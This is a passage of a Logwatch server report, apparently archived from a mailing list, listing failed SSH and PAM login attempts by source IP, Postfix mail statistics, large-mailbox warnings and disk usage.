(119.45.193.82): 1 Time(s) root (120.133.136.75): 1 Time(s) root (120.48.26.72): 1 Time(s) root (128.199.52.4): 1 Time(s) root (129.213.89.251): 1 Time(s) root (129.28.78.8): 1 Time(s) root (138.197.178.159): 1 Time(s) root (139.199.5.50): 1 Time(s) root (150.158.153.133): 1 Time(s) root (157.230.231.39): 1 Time(s) root (157.245.140.49): 1 Time(s) root (171.251.31.102): 1 Time(s) root (182.148.53.170): 1 Time(s) root (190.190.229.75): 1 Time(s) root (45.186.132.130): 1 Time(s) root (45.55.39.193): 1 Time(s) root (49.233.119.93): 1 Time(s) root (49.234.126.204): 1 Time(s) root (52.149.224.242): 1 Time(s) root (81.68.143.165): 1 Time(s) root (91.232.197.100): 1 Time(s) root (94.191.75.220): 1 Time(s) root (ip115.ip-137-74-219.eu): 1 Time(s) root (ip134.ip-151-80-183.eu): 1 Time(s) sshd (45.146.164.79): 1 Time(s) temp (45.93.201.193): 1 Time(s) unknown (132.232.143.211): 1 Time(s) unknown (60.166.8.174): 1 Time(s) unknown (h-107-91.a317.priv.bahnhof.se): 1 Time(s) Invalid Users: Unknown Account: 259 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 13 Miscellaneous warnings 20.381K Bytes accepted 20,870 20.381K Bytes sent via SMTP 20,870 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 4 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 4 Total 4xx Rejects 100.00% ======== ================================================== 62 Connections 13 Connections lost (inbound) 62 Disconnections 1 Removed from queue 1 Sent via SMTP 1 Hostname verification errors (FCRDNS) ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Failed logins from: 2.45.185.2 (net-2-45-185-2.cust.vodafonedsl.it): 48 times 2.57.90.33: 2 times 4.17.231.207: 57 times 36.89.140.123: 45 times 36.156.154.218: 30 times 42.193.102.218: 38 times 45.55.39.193 (demo.nirmanascan.net): 1 time 45.93.201.193: 1 time 45.146.164.79: 1 time 45.186.132.130: 1 time 46.101.194.220: 51 times 46.164.143.82: 63 times 49.51.180.170: 63 times 49.176.146.35 (static-n49-176-146-35.meb4.vic.optusnet.com.au): 7 times 49.232.223.172: 42 times 49.233.119.93: 1 time 49.234.28.149: 28 times 49.234.126.204: 1 time 49.235.41.58: 38 times 51.68.137.63 (vps-0ae1031a.vps.ovh.net): 25 times 51.178.47.46 (46.ip-51-178-47.eu): 62 times 51.178.139.41 (vps-fbabd881.vps.ovh.net): 63 times 51.255.35.41 (41.ip-51-255-35.eu): 62 times 52.149.224.242: 1 time 61.2.243.4 (static.ftth.kta.61.2.243.4.bsnl.in): 58 times 62.4.16.39: 64 times 62.173.166.68 (68.166.173.62.host.static.ip.kpnqwest.it): 65 times 81.17.30.198 (cabinetstogo.com): 4 times 81.68.143.165: 1 time 81.68.215.10: 40 times 81.69.33.14: 29 times 81.70.99.146: 40 times 81.70.224.17: 14 times 81.71.136.41: 19 times 81.86.82.68 (host-81-86-82-68.static.as9105.net): 38 times 81.161.63.100: 3 times 81.161.63.101: 2 times 81.161.63.103: 2 times 91.232.197.100: 1 time 93.149.180.144 (net-93-149-180-144.cust.vodafonedsl.it): 15 times 94.191.75.220: 1 time 102.38.50.50: 60 times 103.246.240.30 (103.246.240.30.soipl.co.in): 54 times 104.131.186.240: 62 times 106.13.30.226: 50 times 106.52.70.240: 48 times 106.53.135.98: 39 times 106.53.236.114: 1 time 106.75.122.38: 31 times 111.67.194.41: 60 times 111.231.55.75: 1 time 112.6.121.116: 54 times 112.215.113.11: 13 times 115.159.56.151: 53 times 115.159.142.211: 1 time 115.159.209.172: 45 times 115.159.216.109: 55 times 116.126.85.123: 70 times 116.232.81.158: 54 times 119.29.74.28: 47 times 119.29.115.153: 30 times 119.39.54.6: 1 time 119.45.10.5: 39 times 119.45.116.10: 50 times 119.45.193.82: 1 time 119.45.243.232: 57 times 119.84.128.25: 36 times 120.48.12.77: 63 times 120.48.26.72: 1 time 120.53.227.201: 38 times 120.133.136.75: 1 time 121.4.162.82: 38 times 122.51.248.146: 37 times 124.90.52.90: 56 times 124.156.105.251: 51 times 128.199.52.4: 1 time 129.28.78.8: 1 time 129.204.125.231: 30 times 129.213.89.251: 1 time 132.232.59.78: 45 times 132.232.120.145: 16 times 132.232.143.211: 36 times 134.122.130.38: 44 times 134.209.149.43 (ellementry360degree.com): 56 times 137.74.219.115 (ip115.ip-137-74-219.eu): 1 time 138.197.178.159: 1 time 139.186.143.194: 34 times 139.199.5.50: 1 time 139.215.208.125 (125.208.215.139.adsl-pool.jlccptt.net.cn): 39 times 142.93.3.47: 55 times 144.91.84.171 (vmi501273.contaboserver.net): 115 times 144.217.13.40 (40.ip-144-217-13.net): 23 times 144.217.85.4 (4.ip-144-217-85.net): 2 times 145.239.82.192 (192.ip-145-239-82.eu): 64 times 150.158.153.133: 1 time 151.80.183.134 (ip134.ip-151-80-183.eu): 1 time 157.230.90.18 (server.amazonusaa.cf): 58 times 157.230.231.39 (singulart.tech-ubuntu-s-1vcpu-1gb-nyc1-01): 1 time 157.245.140.49: 1 time 157.245.212.8: 70 times 163.172.157.193 (193-157-172-163.instances.scw.cloud): 64 times 167.172.154.233: 45 times 170.106.35.43: 22 times 170.106.82.81: 2 times 171.84.2.6: 40 times 171.251.31.102 (dynamic-ip-adsl.viettel.vn): 1 time 174.138.20.105: 70 times 175.100.138.49 (49-138-100-175.static.youbroadband.in): 3 times 177.56.186.115 (177-56-186-115.3g.claro.net.br): 18 times 177.140.196.172 (b18cc4ac.virtua.com.br): 48 times 177.220.173.134 (134.173.220.177.rfc6598.dynamic.copelfibra.com.br): 6 times 181.16.17.224 (host-181-16-17-224.telered.com.ar): 49 times 182.148.53.170: 1 time 185.24.233.48 (48-233-24-185.static.servebyte.com): 28 times 187.95.124.103 (103.124.95.187.static.copel.net): 7 times 188.166.158.69: 44 times 189.14.124.17: 70 times 190.24.6.162 (corporativos246-162.etb.net.co): 52 times 190.190.229.75 (75-229-190-190.cab.prima.net.ar): 1 time 191.205.248.196 (191-205-248-196.user.vivozap.com.br): 30 times 191.209.88.62 (191-209-88-62.user.vivozap.com.br): 50 times 192.241.185.120: 9 times 194.61.25.28: 2 times 195.216.207.22 (unname.z-tele.com.ua): 62 times 198.27.66.37 (track1.glovision.co): 63 times 198.199.103.79: 4 times 202.126.93.131: 53 times 206.189.138.29: 28 times 206.189.160.233: 23 times 221.181.185.143: 18 times 221.213.129.46: 40 times 222.112.186.86: 48 times 222.187.238.87: 21 times 222.187.239.31: 30 times Illegal users from: undef: 118 times 45.93.201.193: 2 times 45.146.164.79: 16 times 60.166.8.174: 1 time 65.49.20.66 (scan-17.shadowserver.org): 1 time 81.17.30.198 (cabinetstogo.com): 16 times 132.232.143.211: 1 time 144.91.84.171 (vmi501273.contaboserver.net): 179 times 144.217.13.40 (40.ip-144-217-13.net): 30 times 158.174.107.91 (h-107-91.A317.priv.bahnhof.se): 1 time 171.239.254.84 (dynamic-ip-adsl.viettel.vn): 3 times 171.251.31.102 (dynamic-ip-adsl.viettel.vn): 2 times 183.97.39.5: 2 times 194.61.25.28: 3 times 195.54.160.250: 3 times ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/ploop47755p1 394G 242G 132G 65% / none 4.0G 0 4.0G 0% /dev ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################

4 Jahre, 7 Monate

1
0
0 / 0

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016

TOPF Februar 2021